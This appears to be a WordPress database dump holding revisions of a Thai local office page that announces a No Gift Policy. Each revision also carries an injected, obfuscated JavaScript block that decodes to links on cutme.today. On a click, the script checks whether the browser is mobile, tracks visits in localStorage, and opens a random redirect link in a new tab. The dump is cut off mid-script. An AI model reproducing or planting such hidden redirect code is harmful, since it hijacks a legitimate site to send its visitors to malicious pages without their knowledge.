_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:39:43','2025-06-09 06:39:43','',859,'http://pakhaeng.ssk.in.th/?p=1308',0,'revision','',0),
(1309,1,'2025-06-09 13:39:44','2025-06-09 06:39:44','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"full\"} -->\n<div class=\"wp-block-file alignfull\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:39:44','2025-06-09 06:39:44','',859,'http://pakhaeng.ssk.in.th/?p=1309',0,'revision','',0),
(1310,1,'2025-06-09 13:40:09','2025-06-09 06:40:09','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true,\"align\":\"wide\"} -->\n<div class=\"wp-block-file alignwide\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 